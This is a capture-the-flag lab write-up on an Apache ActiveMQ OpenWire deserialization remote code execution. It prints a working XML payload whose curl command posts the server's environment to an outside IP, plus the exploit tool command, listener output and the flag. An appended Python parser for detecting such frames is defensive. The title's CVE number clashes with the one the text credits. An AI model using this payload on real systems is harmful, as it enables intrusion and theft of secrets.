CVE-2025-24367
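Information
Target description:
In Apache ActiveMQ 5.18.2 and earlier, there is a deserialization vulnerability in OpenWire protocol communication. It allows a remote attacker with network access to manipulate the serialized class types in the OpenWire protocol, causing the broker to instantiate any class on its classpath and thereby execute arbitrary commands.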
- CVE
Entry point
http://c797f9cc-5a13-4f84-a959-7ee67a1d47bd-488.cyberstrikelab.com:48373
Following X1r0z/ActiveMQ-RCE: ActiveMQ RCE (CVE-2023-46604) exploit tool is all that is needed.
Use the following payload
poc.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg >
            <list>
                <!-- <value>open</value>
                <value>-a</value>
                <value>calculator</value> -->
                <value>bash</value>
                <value>-c</value>
                <value>curl -X POST 8.***.***.180:10000 -d "data=$(env)"</value>
            </list>
        </constructor-arg>
    </bean>
</beans>
Host this file over HTTP, then send the request
┌──(randark㉿kali)-[~/tools/ActiveMQ-RCE]
└─$ ./ActiveMQ-RCE -i c797f9cc-5a13-4f84-a959-7ee67a1d47bd-488.cyberstrikelab.com -p 48373 -u http://8.129.29.180:10001/poc.xml
[*] Target: c797f9cc-5a13-4f84-a959-7ee67a1d47bd-488.cyberstrikelab.com:48373
[*] XML URL: http://8.129.29.180:10001/poc.xml
[*] Sending packet: 000000741f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010021687474703a2f2f382e3132392e32392e3138303a31303030312f706f632e786d6c
The output then arrives at the listener
root@jmt-projekt:~# nc -lvnp 10000
Listening on 0.0.0.0 10000
Connection received on 211.137.105.42 19156
POST / HTTP/1.1
Host: 8.129.29.180:10000
User-Agent: curl/7.74.0
Accept: */*
Content-Length: 798
Content-Type: application/x-www-form-urlencoded
data=KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
HOSTNAME=trp-ebc78c88-bfe3-48b5-8473-3c59182197ae-488
ACTIVEMQ_TCP=61616
ACTIVEMQ_VERSION=5.17.3
JAVA_HOME=/usr/local/openjdk-11
PWD=/opt/activemq
ACTIVEMQ_WS=61614
_=/usr/bin/env
flag=go-flag{c2b08193-fabd-4638-9271-2beded70bc49}
HOME=/root
LANG=C.UTF-8
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
ACTIVEMQ_STOMP=61613
ACTIVEMQ_AMQP=5672
ACTIVEMQ_HOME=/opt/activemq
ACTIVEMQ_MQTT=1883
ACTIVEMQ_UI=8161
SHLVL=1
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
PATH=/usr/local/openjdk-11/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ACTIVEMQ=apache-activemq-5.17.3
JAVA_VERSION=11.0.16
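For detection, the frame printed after `[*] Sending packet:` above can be decoded field by field: it is an OpenWire ExceptionResponse (type byte 0x1f) whose "throwable" class is a Spring application context and whose message is a URL. The following is an added example, not part of the original write-up or of the ActiveMQ-RCE tool; the field names are a reading of the bytes shown, and the `is_suspicious` heuristic is an assumption, not a vendor rule.

```python
import struct

EXCEPTION_RESPONSE = 0x1F  # type byte of the frame shown in the tool output

# The frame from the tool output above, split per field for readability.
PAGE_FRAME = bytes.fromhex(
    "00000074" "1f" "00000000" "00" "00000000" "01"  # length, type, ids, throwable present
    "01" "0042"                                      # class name present, 66 bytes
    "6f72672e737072696e676672616d65776f726b2e636f6e746578742e"
    "737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874"
    "01" "0021"                                      # message present, 33 bytes
    "687474703a2f2f382e3132392e32392e3138303a31303030312f706f632e786d6c"
)

def read_string(buf, off):
    """Nullable string: 1-byte presence flag, 2-byte big-endian length, bytes."""
    if buf[off] == 0:
        return None, off + 1
    (n,) = struct.unpack_from(">H", buf, off + 1)
    end = off + 3 + n
    if end > len(buf):
        raise ValueError("string runs past end of frame")
    return buf[off + 3:end].decode("utf-8", "replace"), end

def parse_exception_response(frame):
    """Return (class_name, message), or None when no throwable is carried."""
    try:
        (size,) = struct.unpack_from(">I", frame, 0)
        if size != len(frame) - 4:
            raise ValueError("length prefix does not match frame size")
        if frame[4] != EXCEPTION_RESPONSE:
            return None
        off = 4 + 1 + 4 + 1 + 4  # length, type, commandId, responseRequired, correlationId
        if frame[off] == 0:
            return None
        cls, off = read_string(frame, off + 1)
        msg, off = read_string(frame, off)
        return cls, msg
    except (IndexError, struct.error) as exc:
        raise ValueError("truncated frame") from exc

def is_suspicious(frame):
    """Heuristic (assumption): flag non-exception class names or URL messages."""
    parsed = parse_exception_response(frame)
    if parsed is None:
        return False
    cls, msg = parsed
    looks_throwable = (cls or "").endswith(("Exception", "Error"))
    has_url = (msg or "").lower().startswith(("http://", "https://", "ftp://", "file:"))
    return (not looks_throwable) or has_url
```

In a sensor this would run on client-to-broker traffic on the OpenWire port (61616 in the environment dump above), where an ExceptionResponse naming a non-exception class is not expected.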